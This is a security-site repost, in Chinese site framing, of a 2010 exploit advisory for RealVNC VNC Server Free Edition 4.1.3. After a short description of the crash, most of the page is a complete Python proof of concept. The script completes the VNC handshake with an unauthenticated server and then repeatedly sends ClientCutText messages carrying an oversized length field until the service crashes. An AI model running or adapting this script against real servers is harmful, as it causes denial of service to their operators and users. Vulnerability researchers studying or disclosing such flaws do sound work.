首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RealVNC VNC Server Free Edition version 4.1.3 remote denial of service exploit
来源:john.leitch5[at]gmail.com 作者:Leitch 发布时间:2010-05-04  
#==================================================================================================#
#                                                                                                  #
#  $$$$\  $\                     $\                                     $\        $$$\    #
#  $  __$\ \__|                    $ |                                    $ |      $  __$\   #
#  $ |  $ |$\  $$$$\  $$$\  $$$$\   $$$\  $$$$\   $$$\  $ |      $ /  $ |  #
#  $$$$\ |$ |$  _____|$  __$\ $  __$\ $  __$\ $  __$\ $  __$\ $ |      $$$$ |  #
#  $  __$\ $ |\$$$\  $ /  $ |$ |  $ |$$$$ |$ |  $ |$ /  $ |$ |      $  __$ |  #
#  $ |  $ |$ | \____$\ $ |  $ |$ |  $ |$   ____|$ |  $ |$ |  $ |$ |      $ |  $ |  #
#  $$$$  |$ |$$$$  |$$$$  |$ |  $ |\$$$$\ $ |  $ |\$$$  |$ |      $ |  $ |  #
#  \_______/ \__|\_______/ $  ____/ \__|  \__| \_______|\__|  \__| \______/ \__|      \__|  \__|  #
#                          $ |                                                                    #
#                          $ |                                         Plastics Make It Possible  #
#                          \__|                                                                    #
#                                                                                                  #
#==================================================================================================#
#                                                                                                  #
# Vulnerability............Denial-of-Service                                                       #
# Software.................RealVNC VNC Server Free Edition 4.1.3                                   #
# Download.................http://www.realvnc.com/products/free/4.1/download.html                  #
# Date.....................5/2/10                                                                  #
#                                                                                                  #
#==================================================================================================#
#                                                                                                  #
# Site.....................http://cross-site-scripting.blogspot.com/                               #
# Email....................john.leitch5@gmail.com                                                  #
#                                                                                                  #
#==================================================================================================#
#                                                                                                  #
# ##Description##                                                                                  #
#                                                                                                  #
# Sending a ClientCutText Message with a length of 0xFFFFFFFF crashes the server with the          #
# exception shown below. Note: while the vulnerability is present regardless of authentication,    #
# for the sake of simplicity this script only works on servers configured to run with no           #
# authentication.                                                                                  #
#                                                                                                  #
# winvnc4.exe: The instruction at 0x425BE4 referenced memory at 0xFFFFFF00. The memory could not   #
# be written (0x00425BE4 -> FFFFFF00)                                                              #
#                                                                                                  #
#                                                                                                  #
# ##Proof of Concept##                                                                             #
import sys, struct, socket
host ='localhost'
port = 5900

def crash_vnc_server():
    try:
        while 1:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.settimeout(1.0)       
            
            print 'Connected'

            try:
                b = s.recv(8192)
                print 'ProtocolVersion Received'
                
                s.send(b)
                print 'ProtocolVersion Sent'            
                
                b = s.recv(8192)
                print 'Security Received'

                s.send('\x01')
                print 'Security Sent'
                
                # Recv SecurityResult
                b = s.recv(8192)
                print 'SecurityResult Received'

                if (len(b) == 4 and
                    b[0] == chr(0) and
                    b[1] == chr(0) and
                    b[2] == chr(0) and
                    b[3] == chr(0)):
                    print 'SecurityResult OK'
                else:
                    print 'SecurityResult Failed.\n\nThe server must be set '\
                          'to No Authentication for this to work, otherwise '\
                          'you \'ll need to write the necessary client side '\
                          'authentication code yourself.'
                    return           

                s.send('\x01')
                print 'ClientInit Sent'
                
                b = s.recv(8192)
                print 'ServerInit Received'

                text_len = 0xFFFFFF
                text_str = struct.pack('L', text_len) + '\xAA' * text_len
                
                while 1:
                    s.send('\x06\x00\x00\x00' + text_str)

                    print 'ClientCutText Sent'
                
            except Exception:
                print 'Connection closed'                
            
    except Exception:
        print 'Couldn\'t connect'

crash_vnc_server()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Knowledge Root version 0.9.9.5
·PHP-Nuke 7.0/8.1/8.1.35 Wormab
·ProSSHD 1.2 remote post-auth e
·Internet Explorer 8.0 Denial o
·Winamp v5.572 0day Local Crash
·PhotoFiltre Studio X .tif file
·All Browsers - Long Unicode Do
·VicFTPS v5.0 Directory Travers
·Firefox 3.6.3 Fork Bomb DoS
·Beyond Compare 3.0.13 b9599 (.
·All browsers 0day Crash Exploi
·Linux x86 - execve("/bin/bash"
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved